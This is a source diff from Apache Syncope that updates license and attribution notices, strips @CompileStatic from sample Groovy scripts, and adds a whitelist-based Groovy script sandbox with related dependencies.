+Copyright © Nicolas Gallagher and Jonathan Neal
+
+==
+
 This product includes software developed by Thymeleaf Expression Processor
 Copyright 2016, Emanuel Rabina (http://www.ultraq.net.nz/)
 
@@ -482,16 +538,16 @@ Copyright (c) 2004-present by the Checker Framework developers
 
 ==
 
-This product includes software developed by MojoHaus AnimalSniffer Maven Plugin
-Copyright (c) 2009, codehaus.org
+This product includes software developed by the Stax 2 Extension API Project.
 
 ==
 
-This product includes software developed by the Stax 2 Extension API Project.
+This product includes software developed by the Woodstox Project.
 
 ==
 
-This product includes software developed by the Woodstox Project.
+This product includes software developed by groovy-sandbox
+Copyright (c) 2012-2020 Kohsuke Kawaguchi, CloudBees, Inc., other contributors
 
 ==
 
@@ -500,6 +556,11 @@ Copyright (c) 2015 Jakub Danek
 
 ==
 
+This product includes software developed by Terracotta. Inc.
+Ehcache source code and documentation are Copyright (c) Terracotta, Inc.
+
+==
+
 This product includes software developed by the Flowable project.
 
 ==
@@ -634,11 +695,6 @@ Copyright 2012 Twitter, Inc.
 
 ==
 
-This product includes software developed by the Chart.js project.
-Copyright (c) 2018 Chart.js Contributors
-
-==
-
 This product includes software developed by Moment.js.
 Copyright (c) JS Foundation and other contributors
 
@@ -649,38 +705,17 @@ Copyright (c) 2012-2016 Dan Wheeler and Dropbox, Inc.
 
 ==
 
-This product includes software developed by balanced-match
-Copyright (c) 2013 Julian Gruber <julian@juliangruber.com>
-
-==
-
-This product includes software developed by base64-js
-Copyright (c) 2014 Jameson Little
-
-==
-
-This product includes software developed by css-vars-ponyfill
-Copyright (c) 2018 John Hildenbiddle
-
-==
-
-This product includes software developed by get-css-data
-Copyright (c) 2018 John Hildenbiddle
-
-==
-
-This product includes software developed by Inputmask
-Copyright (c) 2010 - 2018 Robin Herbots
+This product includes software developed by WicketStuff
+Copyright (c) 1998-2004, Drew Davidson and Luke Blanshard
 
 ==
 
-This product includes software developed by Material Components for the web
-Copyright 2018 Google Inc.
+This product includes software developed by the SnakeYAML project.
 
 ==
 
-This product includes software developed by normalize.css
-Copyright © Nicolas Gallagher and Jonathan Neal
+This product includes software developed by popper.js
+Copyright (c) 2021 Floating UI contributors
 
 ==
 
@@ -689,37 +724,23 @@ Copyright (c) 2015~ Summernote Team (https://github.com/orgs/summernote/people)
 
 ==
 
-This product includes software developed by tslib
-Copyright (c) Microsoft Corporation.
-
-==
-
-This product includes software developed by window.fetch polyfill
-Copyright (c) 2014-2016 GitHub, Inc.
-
-==
-
-This product includes software developed by WicketStuff
-Copyright (c) 1998-2004, Drew Davidson and Luke Blanshard
-
-==
-
-This product includes software developed by the SnakeYAML project.
+This product includes software developed by Tempus Dominus Bootstrap 4 Datetime Picker
+Copyright (c) 2016 Tempus Dominus
 
 ==
 
-This product includes software developed by popper.js
-Copyright (c) 2021 Floating UI contributors
+This product includes software developed by tslib
+Copyright (c) Microsoft Corporation.
 
 ==
 
-This product includes software developed by Tempus Dominus Bootstrap 4 Datetime Picker
-Copyright (c) 2016 Tempus Dominus
+This product includes software developed by Webjars-locator core functionality
+Copyright (c) 2013 James Ward
 
 ==
 
-This product includes software developed by Webjars-locator core functionality
-Copyright (c) 2013 James Ward
+This product includes software developed by window.fetch polyfill
+Copyright (c) 2014-2016 GitHub, Inc.
 
 ==
 

@@ -16,12 +16,10 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import org.apache.syncope.core.provisioning.api.rules.AccountRule
 import org.apache.syncope.core.persistence.api.entity.user.LinkedAccount
 import org.apache.syncope.core.persistence.api.entity.user.User
 
-@CompileStatic
 class MyAccountRule implements AccountRule {
   
   void enforce(String username) {

@@ -16,12 +16,10 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import org.apache.syncope.core.persistence.api.attrvalue.PlainAttrValueValidator
 import org.apache.syncope.core.persistence.api.entity.PlainAttrValue
 import org.apache.syncope.core.persistence.api.entity.PlainSchema
 
-@CompileStatic
 class MyAttrValueValidator implements PlainAttrValueValidator {
   
   @Override

@@ -16,11 +16,9 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import org.apache.syncope.common.lib.command.CommandArgs
 import org.apache.syncope.core.provisioning.api.macro.Command
 
-@CompileStatic
 class MyCommand implements Command<CommandArgs> {
 
   @Override

@@ -16,12 +16,10 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import java.util.List
 import org.apache.syncope.common.lib.to.AttributableTO
 import org.apache.syncope.core.persistence.api.attrvalue.DropdownValueProvider
 
-@CompileStatic
 class MyDropdownValueProvider implements DropdownValueProvider {
   List<String> getChoices(AttributableTO attributableTO) {
     return []

@@ -16,7 +16,6 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import java.util.Set
 import org.apache.syncope.common.lib.request.AnyCR
 import org.apache.syncope.common.lib.request.AnyUR
@@ -34,7 +33,6 @@ import org.apache.syncope.core.provisioning.api.pushpull.ProvisioningProfile
 import org.apache.syncope.core.provisioning.api.pushpull.InboundActions
 import org.identityconnectors.framework.common.objects.LiveSyncDelta
 
-@CompileStatic
 class MyInboundActions implements InboundActions {
 
   @Override

@@ -16,13 +16,11 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import org.apache.syncope.common.lib.to.Provision
 import org.apache.syncope.core.persistence.api.dao.InboundCorrelationRule
 import org.apache.syncope.core.persistence.api.dao.search.SearchCond
 import org.identityconnectors.framework.common.objects.LiveSyncDelta
 
-@CompileStatic
 class MyInboundCorrelationRule implements InboundCorrelationRule {
 
   @Override

@@ -16,7 +16,6 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import java.util.List;
 import org.apache.commons.lang3.tuple.Pair
 import org.apache.syncope.common.lib.to.EntityTO
@@ -26,7 +25,6 @@ import org.apache.syncope.core.persistence.api.entity.Any
 import org.apache.syncope.core.persistence.api.entity.PlainAttrValue
 import org.apache.syncope.core.provisioning.api.data.ItemTransformer
 
-@CompileStatic
 class MyItemTransformer implements ItemTransformer {
 	
   @Override

@@ -16,13 +16,11 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import org.apache.syncope.common.lib.to.Provision
 import org.apache.syncope.core.provisioning.api.LiveSyncDeltaMapper
 import org.identityconnectors.framework.common.objects.LiveSyncDelta
 import org.identityconnectors.framework.common.objects.SyncDelta
 
-@CompileStatic
 class MyLiveSyncDeltaMapper implements LiveSyncDeltaMapper {
  
   @Override

@@ -16,14 +16,12 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import org.apache.syncope.common.lib.request.AnyCR
 import org.apache.syncope.common.lib.request.AnyUR
 import org.apache.syncope.common.lib.to.AnyTO
 import org.apache.syncope.common.lib.to.PropagationStatus
 import org.apache.syncope.core.logic.api.LogicActions
 
-@CompileStatic
 class MyLogicActions implements LogicActions {
   
   @Override
@@ -55,4 +53,4 @@ class MyLogicActions implements LogicActions {
   <A extends AnyTO> A afterDelete(A input, List<PropagationStatus> statuses) {
     return input;
   }
-}
\ No newline at end of file
+}

@@ -16,7 +16,6 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import java.io.Serializable
 import java.util.Map
 import java.util.Optional
@@ -27,7 +26,6 @@ import org.apache.syncope.core.provisioning.api.macro.Command
 import org.apache.syncope.core.provisioning.api.macro.MacroActions
 import org.apache.syncope.core.provisioning.api.macro.Command.Result
 
-@CompileStatic
 class MyMacroActions implements MacroActions {
 
   @Override

@@ -16,12 +16,10 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import org.apache.syncope.core.provisioning.api.rules.PasswordRule
 import org.apache.syncope.core.persistence.api.entity.user.LinkedAccount
 import org.apache.syncope.core.persistence.api.entity.user.User
 
-@CompileStatic
 class MyPasswordRule implements PasswordRule {
   
   void enforce(String username, String clearPassword) {

@@ -16,7 +16,6 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import java.util.Optional
 import java.util.Set
 import org.apache.syncope.common.lib.to.OrgUnit
@@ -26,7 +25,6 @@ import org.apache.syncope.core.provisioning.api.propagation.PropagationActions
 import org.apache.syncope.core.provisioning.api.propagation.PropagationTaskInfo;
 import org.identityconnectors.framework.common.objects.ConnectorObject
 
-@CompileStatic
 class MyPropagationActions implements PropagationActions {
   
   @Override

@@ -16,11 +16,9 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import org.apache.syncope.common.lib.to.Provision
 import org.apache.syncope.core.provisioning.api.ProvisionSorter
 
-@CompileStatic
 class MyProvisionSorter implements ProvisionSorter {
  
   @Override

@@ -16,15 +16,13 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import java.util.Set
 import org.apache.syncope.common.lib.to.ProvisioningReport
 import org.apache.syncope.core.persistence.api.entity.Entity
 import org.apache.syncope.core.provisioning.api.job.JobExecutionException
 import org.apache.syncope.core.provisioning.api.pushpull.ProvisioningProfile
 import org.apache.syncope.core.provisioning.api.pushpull.PushActions
 
-@CompileStatic
 class MyPushActions implements PushActions {
   
   @Override

@@ -16,14 +16,12 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import org.apache.syncope.common.lib.to.Provision
 import org.apache.syncope.core.persistence.api.dao.PushCorrelationRule
 import org.apache.syncope.core.persistence.api.entity.Any
 import org.apache.syncope.core.persistence.api.entity.ExternalResource
 import org.identityconnectors.framework.common.objects.filter.Filter
 
-@CompileStatic
 class MyPushCorrelationRule implements PushCorrelationRule {
 
   @Override

@@ -16,14 +16,12 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import java.util.Map
 import java.util.Set
 import org.apache.syncope.core.persistence.api.entity.Any
 import org.apache.syncope.core.persistence.api.entity.Notification
 import org.apache.syncope.core.provisioning.api.notification.RecipientsProvider
 
-@CompileStatic
 class MyRecipientsProvider implements RecipientsProvider {
   
   @Override

@@ -16,13 +16,11 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import org.apache.syncope.core.provisioning.api.pushpull.ReconFilterBuilder
 import org.identityconnectors.framework.common.objects.ObjectClass
 import org.identityconnectors.framework.common.objects.filter.Filter
 import org.identityconnectors.framework.impl.api.local.operations.FilteredResultsHandler
 
-@CompileStatic
 class MyReconFilterBuilder implements ReconFilterBuilder {
   
   @Override

@@ -16,13 +16,11 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import org.apache.syncope.common.lib.report.ReportConf
 import org.apache.syncope.core.provisioning.api.job.JobExecutionContext
 import org.apache.syncope.core.provisioning.api.job.JobExecutionException
 import org.apache.syncope.core.provisioning.api.job.report.ReportJobDelegate
 
-@CompileStatic
 class MyReportJobDelegate implements ReportJobDelegate {	
   
   void setConf(ReportConf conf) {

@@ -16,13 +16,11 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import org.apache.syncope.common.lib.types.TaskType
 import org.apache.syncope.core.provisioning.api.job.JobExecutionContext
 import org.apache.syncope.core.provisioning.api.job.JobExecutionException
 import org.apache.syncope.core.provisioning.api.job.SchedTaskJobDelegate
 
-@CompileStatic
 class MySchedTaskJobDelegate implements SchedTaskJobDelegate {
 
   @Override

@@ -0,0 +1,226 @@
+
+                                 Apache License
+                           Version 2.0, January 2004
+                        http://www.apache.org/licenses/
+
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+      "License" shall mean the terms and conditions for use, reproduction,
+      and distribution as defined by Sections 1 through 9 of this document.
+
+      "Licensor" shall mean the copyright owner or entity authorized by
+      the copyright owner that is granting the License.
+
+      "Legal Entity" shall mean the union of the acting entity and all
+      other entities that control, are controlled by, or are under common
+      control with that entity. For the purposes of this definition,
+      "control" means (i) the power, direct or indirect, to cause the
+      direction or management of such entity, whether by contract or
+      otherwise, or (ii) ownership of fifty percent (50%) or more of the
+      outstanding shares, or (iii) beneficial ownership of such entity.
+
+      "You" (or "Your") shall mean an individual or Legal Entity
+      exercising permissions granted by this License.
+
+      "Source" form shall mean the preferred form for making modifications,
+      including but not limited to software source code, documentation
+      source, and configuration files.
+
+      "Object" form shall mean any form resulting from mechanical
+      transformation or translation of a Source form, including but
+      not limited to compiled object code, generated documentation,
+      and conversions to other media types.
+
+      "Work" shall mean the work of authorship, whether in Source or
+      Object form, made available under the License, as indicated by a
+      copyright notice that is included in or attached to the work
+      (an example is provided in the Appendix below).
+
+      "Derivative Works" shall mean any work, whether in Source or Object
+      form, that is based on (or derived from) the Work and for which the
+      editorial revisions, annotations, elaborations, or other modifications
+      represent, as a whole, an original work of authorship. For the purposes
+      of this License, Derivative Works shall not include works that remain
+      separable from, or merely link (or bind by name) to the interfaces of,
+      the Work and Derivative Works thereof.
+
+      "Contribution" shall mean any work of authorship, including
+      the original version of the Work and any modifications or additions
+      to that Work or Derivative Works thereof, that is intentionally
+      submitted to Licensor for inclusion in the Work by the copyright owner
+      or by an individual or Legal Entity authorized to submit on behalf of
+      the copyright owner. For the purposes of this definition, "submitted"
+      means any form of electronic, verbal, or written communication sent
+      to the Licensor or its representatives, including but not limited to
+      communication on electronic mailing lists, source code control systems,
+      and issue tracking systems that are managed by, or on behalf of, the
+      Licensor for the purpose of discussing and improving the Work, but
+      excluding communication that is conspicuously marked or otherwise
+      designated in writing by the copyright owner as "Not a Contribution."
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity
+      on behalf of whom a Contribution has been received by Licensor and
+      subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      copyright license to reproduce, prepare Derivative Works of,
+      publicly display, publicly perform, sublicense, and distribute the
+      Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      (except as stated in this section) patent license to make, have made,
+      use, offer to sell, sell, import, and otherwise transfer the Work,
+      where such license applies only to those patent claims licensable
+      by such Contributor that are necessarily infringed by their
+      Contribution(s) alone or by combination of their Contribution(s)
+      with the Work to which such Contribution(s) was submitted. If You
+      institute patent litigation against any entity (including a
+      cross-claim or counterclaim in a lawsuit) alleging that the Work
+      or a Contribution incorporated within the Work constitutes direct
+      or contributory patent infringement, then any patent licenses
+      granted to You under this License for that Work shall terminate
+      as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the
+      Work or Derivative Works thereof in any medium, with or without
+      modifications, and in Source or Object form, provided that You
+      meet the following conditions:
+
+      (a) You must give any other recipients of the Work or
+          Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices
+          stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works
+          that You distribute, all copyright, patent, trademark, and
+          attribution notices from the Source form of the Work,
+          excluding those notices that do not pertain to any part of
+          the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its
+          distribution, then any Derivative Works that You distribute must
+          include a readable copy of the attribution notices contained
+          within such NOTICE file, excluding those notices that do not
+          pertain to any part of the Derivative Works, in at least one
+          of the following places: within a NOTICE text file distributed
+          as part of the Derivative Works; within the Source form or
+          documentation, if provided along with the Derivative Works; or,
+          within a display generated by the Derivative Works, if and
+          wherever such third-party notices normally appear. The contents
+          of the NOTICE file are for informational purposes only and
+          do not modify the License. You may add Your own attribution
+          notices within Derivative Works that You distribute, alongside
+          or as an addendum to the NOTICE text from the Work, provided
+          that such additional attribution notices cannot be construed
+          as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and
+      may provide additional or different license terms and conditions
+      for use, reproduction, or distribution of Your modifications, or
+      for any such Derivative Works as a whole, provided Your use,
+      reproduction, and distribution of the Work otherwise complies with
+      the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise,
+      any Contribution intentionally submitted for inclusion in the Work
+      by You to the Licensor shall be under the terms and conditions of
+      this License, without any additional terms or conditions.
+      Notwithstanding the above, nothing herein shall supersede or modify
+      the terms of any separate license agreement you may have executed
+      with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade
+      names, trademarks, service marks, or product names of the Licensor,
+      except as required for reasonable and customary use in describing the
+      origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or
+      agreed to in writing, Licensor provides the Work (and each
+      Contributor provides its Contributions) on an "AS IS" BASIS,
+      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+      implied, including, without limitation, any warranties or conditions
+      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+      PARTICULAR PURPOSE. You are solely responsible for determining the
+      appropriateness of using or redistributing the Work and assume any
+      risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory,
+      whether in tort (including negligence), contract, or otherwise,
+      unless required by applicable law (such as deliberate and grossly
+      negligent acts) or agreed to in writing, shall any Contributor be
+      liable to You for damages, including any direct, indirect, special,
+      incidental, or consequential damages of any character arising as a
+      result of this License or out of the use or inability to use the
+      Work (including but not limited to damages for loss of goodwill,
+      work stoppage, computer failure or malfunction, or any and all
+      other commercial damages or losses), even if such Contributor
+      has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing
+      the Work or Derivative Works thereof, You may choose to offer,
+      and charge a fee for, acceptance of support, warranty, indemnity,
+      or other liability obligations and/or rights consistent with this
+      License. However, in accepting such obligations, You may act only
+      on Your own behalf and on Your sole responsibility, not on behalf
+      of any other Contributor, and only if You agree to indemnify,
+      defend, and hold each Contributor harmless for any liability
+      incurred by, or claims asserted against, such Contributor by reason
+      of your accepting any such warranty or additional liability.
+
+   END OF TERMS AND CONDITIONS
+
+   APPENDIX: How to apply the Apache License to your work.
+
+      To apply the Apache License to your work, attach the following
+      boilerplate notice, with the fields enclosed by brackets "[]"
+      replaced with your own identifying information. (Don't include
+      the brackets!)  The text should be enclosed in the appropriate
+      comment syntax for the file format. We also recommend that a
+      file or class name and description of purpose be included on the
+      same "printed page" as the copyright notice for easier
+      identification within third-party archives.
+
+   Copyright [yyyy] [name of copyright owner]
+
+   Licensed under the Apache License, Version 2.0 (the "License");
+   you may not use this file except in compliance with the License.
+   You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+   Unless required by applicable law or agreed to in writing, software
+   distributed under the License is distributed on an "AS IS" BASIS,
+   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+   See the License for the specific language governing permissions and
+   limitations under the License.
+
+==
+
+For Admin LTE (https://github.com/almasaeed2010/AdminLTE/):
+This is licensed under the terms of the MIT license:
+
+ Permission is hereby granted, free  of charge, to any person obtaining
+ a  copy  of this  software  and  associated  documentation files  (the
+ "Software"), to  deal in  the Software without  restriction, including
+ without limitation  the rights to  use, copy, modify,  merge, publish,
+ distribute,  sublicense, and/or sell  copies of  the Software,  and to
+ permit persons to whom the Software  is furnished to do so, subject to
+ the following conditions:
+ 
+ The  above  copyright  notice  and  this permission  notice  shall  be
+ included in all copies or substantial portions of the Software.
+ 
+ THE  SOFTWARE IS  PROVIDED  "AS  IS", WITHOUT  WARRANTY  OF ANY  KIND,
+ EXPRESS OR  IMPLIED, INCLUDING  BUT NOT LIMITED  TO THE  WARRANTIES OF
+ MERCHANTABILITY,    FITNESS    FOR    A   PARTICULAR    PURPOSE    AND
+ NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
+ LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
+ OF CONTRACT, TORT OR OTHERWISE,  ARISING FROM, OUT OF OR IN CONNECTION
+ WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

@@ -0,0 +1,13 @@
+Apache Syncope
+Copyright 2012-2025 The Apache Software Foundation
+
+This product includes software developed by:
+The Apache Software Foundation (http://www.apache.org/).
+
+The following copyright notice(s) were affixed to portions of this code
+with which this file is now or was at one time distributed.
+
+==
+
+This product includes software developed by the AdminLTE project.
+Copyright (c) 2014-2017 Abdullah Almsaeed

@@ -47,11 +47,6 @@ under the License.
       <artifactId>spring-context-support</artifactId>
     </dependency>
 
-    <dependency>
-      <groupId>org.aspectj</groupId>
-      <artifactId>aspectjweaver</artifactId>
-    </dependency>
-
     <dependency>
       <groupId>org.apache.tika</groupId>
       <artifactId>tika-core</artifactId>

@@ -60,7 +60,41 @@ under the License.
       <groupId>net.tirasa.connid</groupId>
       <artifactId>slf4j-logging</artifactId>
     </dependency>
-      
+
+    <dependency>
+      <groupId>org.apache.groovy</groupId>
+      <artifactId>groovy</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>org.apache.groovy</groupId>
+      <artifactId>groovy-templates</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>org.apache.groovy</groupId>
+      <artifactId>groovy-xml</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>org.apache.groovy</groupId>
+      <artifactId>groovy-jsr223</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>org.apache.groovy</groupId>
+      <artifactId>groovy-datetime</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>org.apache.groovy</groupId>
+      <artifactId>groovy-dateutil</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>org.apache.groovy</groupId>
+      <artifactId>groovy-sql</artifactId>
+    </dependency>
+
+    <dependency>
+      <groupId>net.tirasa</groupId>
+      <artifactId>groovy-security-sandbox</artifactId>
+    </dependency>
+
     <dependency>
       <groupId>org.apache.syncope.common.idm</groupId>
       <artifactId>syncope-common-idm-lib</artifactId>

@@ -165,7 +165,7 @@ under the License.
                mandatoryCondition="false" multivalue="0" uniqueConstraint="0" readonly="0"
                enumValues='{"M":"Male","F":"Female"}'/>
   <Implementation id="TestDropdownValueProvider" type="DROPDOWN_VALUE_PROVIDER" engine="GROOVY"
-                  body='import groovy.transform.CompileStatic&#13;&#10;import java.util.List&#13;&#10;import org.apache.syncope.common.lib.to.AttributableTO&#13;&#10;import org.apache.syncope.core.persistence.api.attrvalue.DropdownValueProvider&#13;&#10;&#13;&#10;@CompileStatic&#13;&#10;class TestDropdownValueProvider implements DropdownValueProvider {&#13;&#10;List&lt;String&gt; getChoices(AttributableTO attributableTO) {&#13;&#10;return ["A", "B"]&#13;&#10;}&#13;&#10;}'/>
+                  body='import java.util.List&#13;&#10;import org.apache.syncope.common.lib.to.AttributableTO&#13;&#10;import org.apache.syncope.core.persistence.api.attrvalue.DropdownValueProvider&#13;&#10;&#13;&#10;class TestDropdownValueProvider implements DropdownValueProvider {&#13;&#10;List&lt;String&gt; getChoices(AttributableTO attributableTO) {&#13;&#10;return ["A", "B"]&#13;&#10;}&#13;&#10;}'/>
   <SyncopeSchema id="dd"/>
   <PlainSchema id="dd" type="Dropdown" anyTypeClass_id="other"
                mandatoryCondition="false" multivalue="0" uniqueConstraint="0" readonly="0"

@@ -159,7 +159,7 @@ under the License.
                enumValues='{"M":"Male","F":"Female"}'/>
   <PlainSchema_AnyTypeClass left="gender" right="other"/>
   <Implementation id="TestDropdownValueProvider" type="DROPDOWN_VALUE_PROVIDER" engine="GROOVY"
-                  body='import groovy.transform.CompileStatic&#13;&#10;import java.util.List&#13;&#10;import org.apache.syncope.common.lib.to.AttributableTO&#13;&#10;import org.apache.syncope.core.persistence.api.attrvalue.DropdownValueProvider&#13;&#10;&#13;&#10;@CompileStatic&#13;&#10;class TestDropdownValueProvider implements DropdownValueProvider {&#13;&#10;List&lt;String&gt; getChoices(AttributableTO attributableTO) {&#13;&#10;return ["A", "B"]&#13;&#10;}&#13;&#10;}'/>
+                  body='import java.util.List&#13;&#10;import org.apache.syncope.common.lib.to.AttributableTO&#13;&#10;import org.apache.syncope.core.persistence.api.attrvalue.DropdownValueProvider&#13;&#10;&#13;&#10;class TestDropdownValueProvider implements DropdownValueProvider {&#13;&#10;List&lt;String&gt; getChoices(AttributableTO attributableTO) {&#13;&#10;return ["A", "B"]&#13;&#10;}&#13;&#10;}'/>
   <PlainSchema id="dd" type="Dropdown" mandatoryCondition="false" multivalue="0" uniqueConstraint="0" readonly="0"/>
   <PlainSchema_AnyTypeClass left="dd" right="other"/>
   <PlainSchema_Implementation type="PLAIN_SCHEMA_DROPDOWN_VALUE_PROVIDER" left="dd" right="TestDropdownValueProvider"/>

@@ -64,35 +64,6 @@ under the License.
       <artifactId>pdfbox</artifactId>
     </dependency>
 
-    <dependency>
-      <groupId>org.apache.groovy</groupId>
-      <artifactId>groovy</artifactId>
-    </dependency>
-    <dependency>
-      <groupId>org.apache.groovy</groupId>
-      <artifactId>groovy-templates</artifactId>
-    </dependency>
-    <dependency>
-      <groupId>org.apache.groovy</groupId>
-      <artifactId>groovy-xml</artifactId>
-    </dependency>
-    <dependency>
-      <groupId>org.apache.groovy</groupId>
-      <artifactId>groovy-jsr223</artifactId>
-    </dependency>
-    <dependency>
-      <groupId>org.apache.groovy</groupId>
-      <artifactId>groovy-datetime</artifactId>
-    </dependency>
-    <dependency>
-      <groupId>org.apache.groovy</groupId>
-      <artifactId>groovy-dateutil</artifactId>
-    </dependency>
-    <dependency>
-      <groupId>org.apache.groovy</groupId>
-      <artifactId>groovy-sql</artifactId>
-    </dependency>
-
     <dependency>
       <groupId>org.apache.syncope.core</groupId>
       <artifactId>syncope-core-workflow-api</artifactId>

@@ -198,7 +198,7 @@ public void execute(
             message = doExecute(context);
             status = TaskJob.Status.SUCCESS.name();
             result = OpEvent.Outcome.SUCCESS;
-        } catch (JobExecutionException e) {
+        } catch (SecurityException | JobExecutionException e) {
             LOG.error("While executing task {}", taskKey, e);
 
             message = ExceptionUtils2.getFullStackTrace(e);

@@ -81,8 +81,8 @@ under the License.
     </dependency>
 
     <dependency>
-      <groupId>org.apache.groovy</groupId>
-      <artifactId>groovy</artifactId>
+      <groupId>org.aspectj</groupId>
+      <artifactId>aspectjweaver</artifactId>
     </dependency>
 
     <dependency>

@@ -0,0 +1,52 @@
+/*
+ * Licensed to the Apache Software Foundation (ASF) under one
+ * or more contributor license agreements.  See the NOTICE file
+ * distributed with this work for additional information
+ * regarding copyright ownership.  The ASF licenses this file
+ * to you under the Apache License, Version 2.0 (the
+ * "License"); you may not use this file except in compliance
+ * with the License.  You may obtain a copy of the License at
+ *
+ *   http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing,
+ * software distributed under the License is distributed on an
+ * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+ * KIND, either express or implied.  See the License for the
+ * specific language governing permissions and limitations
+ * under the License.
+ */
+package org.apache.syncope.core.spring.implementation;
+
+import org.aspectj.lang.ProceedingJoinPoint;
+import org.aspectj.lang.annotation.Around;
+import org.aspectj.lang.annotation.Aspect;
+import org.jenkinsci.plugins.scriptsecurity.sandbox.Whitelist;
+import org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SandboxInterceptor;
+import org.kohsuke.groovy.sandbox.GroovyInterceptor;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+
+@Aspect
+public class GroovySandbox {
+
+    protected static final Logger LOG = LoggerFactory.getLogger(GroovySandbox.class);
+
+    protected final Whitelist whitelist;
+
+    public GroovySandbox(final Whitelist whitelist) {
+        this.whitelist = whitelist;
+    }
+
+    @Around("execution(* *(..))")
+    public Object around(final ProceedingJoinPoint joinPoint) throws Throwable {
+        GroovyInterceptor interceptor = new SandboxInterceptor(whitelist);
+        try {
+            interceptor.register();
+
+            return joinPoint.proceed();
+        } finally {
+            interceptor.unregister();
+        }
+    }
+}

@@ -18,6 +18,7 @@
  */
 package org.apache.syncope.core.spring.implementation;
 
+import groovy.grape.GrabAnnotationTransformation;
 import groovy.lang.GroovyClassLoader;
 import java.lang.reflect.Modifier;
 import java.lang.reflect.ParameterizedType;
@@ -26,6 +27,7 @@
 import java.util.HashMap;
 import java.util.Map;
 import java.util.Optional;
+import java.util.Set;
 import java.util.function.Consumer;
 import java.util.function.Supplier;
 import org.apache.commons.lang3.tuple.Pair;
@@ -36,6 +38,7 @@
 import org.apache.syncope.common.lib.policy.PushCorrelationRuleConf;
 import org.apache.syncope.common.lib.report.ReportConf;
 import org.apache.syncope.common.lib.types.IdRepoImplementationType;
+import org.apache.syncope.common.lib.types.ImplementationEngine;
 import org.apache.syncope.common.lib.types.ImplementationTypesHolder;
 import org.apache.syncope.core.persistence.api.ApplicationContextProvider;
 import org.apache.syncope.core.persistence.api.entity.Implementation;
@@ -46,13 +49,26 @@
 import org.apache.syncope.core.provisioning.api.rules.PasswordRule;
 import org.apache.syncope.core.provisioning.api.rules.PushCorrelationRule;
 import org.apache.syncope.core.provisioning.api.serialization.POJOHelper;
+import org.codehaus.groovy.control.CompilerConfiguration;
+import org.jenkinsci.plugins.scriptsecurity.sandbox.blacklists.Blacklist;
+import org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.RejectASTTransformsCustomizer;
+import org.kohsuke.groovy.sandbox.SandboxTransformer;
+import org.springframework.aop.aspectj.annotation.AspectJProxyFactory;
 
 public final class ImplementationManager {
 
-    private static final GroovyClassLoader GROOVY_CLASSLOADER = new GroovyClassLoader();
+    private static final GroovyClassLoader GROOVY_CLASSLOADER;
 
